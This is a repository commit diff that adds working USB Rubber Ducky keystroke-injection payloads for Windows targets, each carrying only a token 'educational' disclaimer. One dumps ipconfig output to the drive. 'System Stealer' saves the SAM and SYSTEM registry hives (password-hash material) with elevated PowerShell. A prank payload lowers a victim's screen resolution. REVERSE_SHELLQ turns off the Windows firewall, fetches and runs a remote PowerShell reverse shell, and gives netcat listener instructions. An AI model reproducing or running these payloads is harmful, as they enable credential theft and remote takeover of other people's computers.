Compare commits
23 Commits
690077681b
...
042acc1f62
Author | SHA1 | Date |
---|---|---|
MajoesQ | 042acc1f62 | |
Peaks | 44af31e74b | |
Mavis Coffey | cacb21ad7e | |
Mavis Coffey | 61eb88ab6c | |
Mavis Coffey | 8be0f9a092 | |
Mavis Coffey | 63e0c18618 | |
Mavis Coffey | 81807425f5 | |
Mavis Coffey | 083951025f | |
Mavis Coffey | 1a5aa0bd08 | |
Mavis Coffey | a323fc3281 | |
Mavis Coffey | 420a174f93 | |
Mavis Coffey | c8c6a75d33 | |
Mavis Coffey | 4e89426355 | |
Mavis Coffey | 566683c428 | |
Mavis Coffey | 5ed41467e3 | |
Mavis Coffey | a74d21e848 | |
Mavis Coffey | 0f85a6936e | |
Mavis Coffey | d9baab6395 | |
Mavis Coffey | cf0c83d37c | |
Mavis Coffey | 8293bf5d4d | |
Mavis Coffey | 6ad0b7836c | |
mavisinator30001 | 8073d4d9cd | |
MajoesQ | 13e7756d1e |
|
@ -0,0 +1,12 @@
|
|||
# IP-OUT
|
||||
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Useful Tips
|
||||
|
||||
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||
|
||||
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
@ -0,0 +1,63 @@
|
|||
REM Title: IP-Out
|
||||
REM Author: Mavisinator30001
|
||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||
REM Target: Any Windows System
|
||||
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||
DEFINE #DRIVELABEL DUCKY
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
IF $_OS != WINDOWS
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRINGLN Powershell
|
||||
DELAY 1000
|
||||
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ATTACKMODE OFF
|
||||
HIDE_PAYLOAD
|
|
@ -0,0 +1,74 @@
|
|||
REM TITLE System Stealer
|
||||
REM AUTHOR mavisinator30001
|
||||
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
|
||||
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
|
||||
REM DISCLAIMER This is for educational purposes ONLY
|
||||
DELAY 1000
|
||||
ATTACKMODE HID STORAGE
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
REM Change $DRIVELABEL to the storage label of your duck
|
||||
DEFINE #DRIVELABEL DUCKY
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 1000
|
||||
CTRL-SHIFT-ENTER
|
||||
DELAY 750
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
|
||||
DELAY 250
|
||||
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
STRINGLN reg save HKLM\system $DriveLetter/system.save
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ELSE
|
||||
ATTACKMODE OFF
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
|
@ -0,0 +1,5 @@
|
|||
# Resolution Prank
|
||||
|
||||
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||
|
||||
### Somewhat resource dependent, may not work on older computers
|
|
@ -0,0 +1,103 @@
|
|||
REM TITLE Resolution Prank
|
||||
REM AUTHOR Mavisinator30001
|
||||
REM TARGET Any system running Windows 10/11
|
||||
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
IF $_OS != WINDOWS
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
LED_G
|
||||
DELAY 500
|
||||
CTRL GUI d
|
||||
DELAY 500
|
||||
GUI i
|
||||
DELAY 2000
|
||||
STRINGLN display
|
||||
DELAY 2500
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
REPEAT 8 TAB
|
||||
ENTER
|
||||
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||
HOLD DOWN
|
||||
DELAY 1000
|
||||
RELEASE DOWN
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
||||
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||
VAR $LIGHT_UP_TIMES = 20
|
||||
WHILE ($LIGHT_UP_TIMES > 0)
|
||||
LED_G
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
LED_R
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||
END_WHILE
|
||||
WAIT_FOR_CAPS_CHANGE
|
||||
END_WHILE
|
||||
DELAY 300
|
||||
REPEAT 12 TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
HOLD UP
|
||||
DELAY 1000
|
||||
RELEASE UP
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 200
|
||||
CTRL GUI F4
|
|
@ -0,0 +1,41 @@
|
|||
REM #########################################################################################################################
|
||||
REM Title: REVERSE_SHELLQ
|
||||
REM Description: Disables Windows Firewall And Starts A Minimized Reverse Shell
|
||||
REM Props: MajoesQ
|
||||
REM Targets: Windows 10/11 {TESTED ON WINDOWS 11/10}
|
||||
REM MajoesQ ASSUMES NO RESPONSIBILITY FOR ANY DAMAGES OR STOLEN DATA "USE AT YOUR OWN RISK"
|
||||
REM DON'T FORGET TO START LISTENER "stty raw -echo; (stty size; cat) | nc -lvnp PORT ATACKERS_IP {FOR LINUX}
|
||||
REM DON'T FORGET TO CHANGE ATACKERS IP AND PORT IN LINE 25
|
||||
REM DON'T FORGET TO ENCODE AT "https://payloadstudio.hak5.org/community/"
|
||||
REM #########################################################################################################################
|
||||
REM ENJOY :}
|
||||
DELAY 1000
|
||||
GUI x
|
||||
DELAY 500
|
||||
STRING a
|
||||
DELAY 500
|
||||
LEFT
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING netsh advfirewall set allprofiles state off
|
||||
DELAY 600
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell IP PORT
|
||||
DELAY 1000
|
||||
ENTER
|
||||
ALT SPACE
|
||||
DELAY 400
|
||||
DOWN
|
||||
DELAY 400
|
||||
DOWN
|
||||
DELAY 400
|
||||
DOWN
|
||||
DELAY 400
|
||||
DOWN
|
||||
DELAY 400
|
||||
ENTER
|
||||
CAPSLOCK
|
||||
END
|
||||
REM This is the end #################################################################################################################################################
|
Loading…
Reference in New Issue